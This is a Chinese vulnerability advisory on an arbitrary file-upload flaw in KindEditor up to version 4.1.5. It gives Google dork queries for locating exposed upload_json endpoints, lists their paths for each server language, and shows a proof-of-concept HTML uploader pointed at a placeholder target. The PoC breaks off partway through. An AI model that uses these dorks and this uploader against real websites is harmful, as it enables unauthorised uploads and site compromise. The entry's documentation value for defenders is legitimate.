kindeditor<=4.1.5文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>漏洞描述</p><p>漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net</p><p>漏洞存在于小于等于kindeditor4.1.5编辑器中</p><p>关键字:</p><p> allinurl:/examples/uploadbutton.html</p><p> allinurl:/php/upload_json.php / .asp / .jsp</p><p>根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在</p><p>/asp/upload_json.asp</p><p>/asp.net/upload_json.ashx</p><p>/jsp/upload_json.jsp</p><p>/php/upload_json.php</p><p>poc:<br></p><p><font color="#e33737">&lt;html&gt;&lt;head&gt;</font></p><p><font color="#e33737">&lt;title&gt;Uploader By ICE&lt;/title&gt;</font></p><p><font color="#e33737">&lt;script src="http://[Target]/kindeditor/kindeditor-min.js"&gt;&lt;/script&gt;</font></p><p><font color="#e33737">&lt;script&gt;</font></p><p><font color="#e33737">KindEditor.ready(function(K) {</font></p><p><font color="#e33737">var uploadbutton = K.uploadbutton({</font></p><p><font color="#e33737">button : K('#uploadButton')[0],</font></p><p><font color="#e33737">fieldName : 'imgFile',</font></p><p><font color="#e33737">url :...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息